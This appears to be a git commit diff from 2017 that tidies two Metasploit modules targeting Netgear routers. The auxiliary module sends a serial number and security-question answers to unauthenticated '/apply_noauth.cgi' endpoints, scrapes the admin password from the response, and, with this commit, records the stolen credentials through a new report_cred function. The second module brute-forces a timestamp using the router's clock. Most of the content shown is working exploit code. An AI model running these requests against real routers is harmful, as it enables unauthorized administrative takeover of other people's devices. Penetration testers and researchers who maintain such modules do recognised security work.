made changes suggested

bug/bundler_fix
Pedro Ribeiro 2017-01-04 23:02:10 +00:00
parent 9d3e90e8e5
commit d95a3ff2ac
2 changed files with 53 additions and 25 deletions

View File

@ -96,31 +96,31 @@ class MetasploitModule < Msf::Auxiliary
end end
# 1: send serial number # 1: send serial number
res = send_request_cgi({ send_request_cgi({
'uri' => '/apply_noauth.cgi?/unauth.cgi', 'uri' => '/apply_noauth.cgi?/unauth.cgi',
'method' => 'POST', 'method' => 'POST',
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded',
'vars_post' => 'vars_post' =>
{ {
'submit_flag' => 'match_sn', 'submit_flag' => 'match_sn',
'serial_num' => serial, 'serial_num' => serial,
'continue' => '+Continue+' 'continue' => '+Continue+'
} }
}) })
# 2: send answer to secret questions # 2: send answer to secret questions
res = send_request_cgi({ send_request_cgi({
'uri' => '/apply_noauth.cgi?/securityquestions.cgi', 'uri' => '/apply_noauth.cgi?/securityquestions.cgi',
'method' => 'POST', 'method' => 'POST',
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded',
'vars_post' => 'vars_post' =>
{ {
'submit_flag' => 'security_question', 'submit_flag' => 'security_question',
'answer1' => @q1, 'answer1' => @q1,
'answer2' => @q2, 'answer2' => @q2,
'continue' => '+Continue+' 'continue' => '+Continue+'
} }
}) })
# 3: PROFIT!!! # 3: PROFIT!!!
res = send_request_cgi({ res = send_request_cgi({
@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
if res && res.body =~ /Admin Password: (.*)<\/TD>/ if res && res.body =~ /Admin Password: (.*)<\/TD>/
password = $1 password = $1
if password.nil? or password == "" if password.blank?
fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?") fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
end end
else else
@ -145,6 +145,33 @@ class MetasploitModule < Msf::Auxiliary
return [username, password] return [username, password]
end end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'netgear',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def send_req(timestamp) def send_req(timestamp)
begin begin
@ -211,6 +238,7 @@ class MetasploitModule < Msf::Auxiliary
if res && res.code == 200 if res && res.code == 200
credentials = get_creds credentials = get_creds
print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"") print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
return return
end end
end end

View File

@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
# no shell? let's just go on and bruteforce the timestamp # no shell? let's just go on and bruteforce the timestamp
# 3: get the current date from the router and parse it # 3: get the current date from the router and parse it
end_time = get_current_time end_time = get_current_time
if end_time == nil if end_time.nil?
fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
end end
if end_time <= datastore['TIME_OFFSET'] if end_time <= datastore['TIME_OFFSET']